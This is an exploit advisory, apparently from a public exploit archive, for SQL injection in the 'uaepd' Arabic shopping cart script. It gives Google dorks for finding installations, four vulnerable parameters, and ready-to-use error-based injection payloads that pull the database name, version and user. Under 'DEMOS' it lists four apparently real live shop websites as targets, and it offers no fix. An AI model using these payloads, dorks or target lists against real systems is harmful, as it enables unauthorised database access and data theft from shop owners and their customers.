facebook facebook twitter rss

uaepd script – Multiple Sql Injection Vulnerabilty

Author: AtT4CKxT3rR0r1ST , Published: 09-01-2014
uaepd script  – Multiple Sql Injection Vulnerabilty
====================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.uaepd.net/
.:. Dork : [1]inurl:”products.php?cat_id=” “Powered by: PD ”
[2]inurl:”products.php?p_id” “Powered by: PD ”
[3]inurl:”page.php?id=” “Powered by: PD ”
[4]inurl:”news.php?id=” “Powered by: PD ”
####################################################################

I. INTORUCTION

uaepd script is arabic Shopping Cart Script and have many Features

II. DESCRIPTION

#Control Panel provides an Arabic or English.
#View the store for the visitor in Arabic and English.
#Possibility to choose one language or operating languages.
#The ability to add unlimited number of pages.
#Format property provides all store pages.
#Add YouTube links and images in all the pages of the store.
#The ability to add sections of main and sub.
#Add an unlimited number of products.
#Add multiple images of the products.
#Availability of property sizes and colors for each product.
#Print logo on the product images automatically.
#Availability of property with a shipping price for each region.
#Buy products shopping cart system.
#You can ask system of members with or without system.
#Three ways to pay:(bank transfer-Receipt & received-Paypal).
#Send an e-mail automatically to any purchase or booking.
#Provide a search feature in the products.
#Availability of the currencies of the property.
#Comprehensive statistics for the purchases and reservations.
#Guestbook available partition.
#Provide property advertising space multiple places.
#Property provides the tape device.
#Offers the possibility to close or open the store.

III. TYPE BUG

Sql injection (command double query)

IV. BUG

site/products.php?cat_id=[sql injection]
site/products.php?p_id=[sql injection]
site/page.php?id=[sql injection]
site/news.php?id=[sql injection]

VII. EXPLOIT

TO EXTRACT VERSION & NAME & USER DATABASE:

site/products.php?cat_id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
site/products.php?p_id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
site/page.php?id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
site/news.php?id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

DEMOS:

http://sedenshop.com/products.php?p_id=3

http://www.henna.ae/products.php?cat_id=1

http://www.shah-een.com/news.php?id=1

http://www.nourita.com/products.php?cat_id=4

####################################################################

Like us on Facebook :